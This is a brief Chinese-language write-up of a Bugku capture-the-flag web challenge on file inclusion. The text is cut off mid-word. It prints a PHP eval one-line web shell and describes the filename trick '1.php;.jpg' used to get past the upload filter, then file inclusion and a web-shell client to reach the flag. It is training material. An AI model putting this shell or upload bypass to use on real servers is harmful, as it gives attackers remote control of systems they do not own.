Bugku ctf writeup--web篇-文件包含2

Step1:查看源碼 發現註釋文件upload.php,訪問下來到文件上傳頁面 Step2:上傳一句話 普通一句話會被過濾,這裏構造<?=eval($_POST['shell']);> 保存文件修改後綴爲1.php;.jpg,成功上傳 根據提示是文件包含,直接訪問文件路徑無效,菜刀無法連接 包含文件進行訪問是空白頁面,再進行菜刀連接 Step3:上菜刀 發現一個文件名很長的txt文件,打開就是fl
相關文章
相關標籤/搜索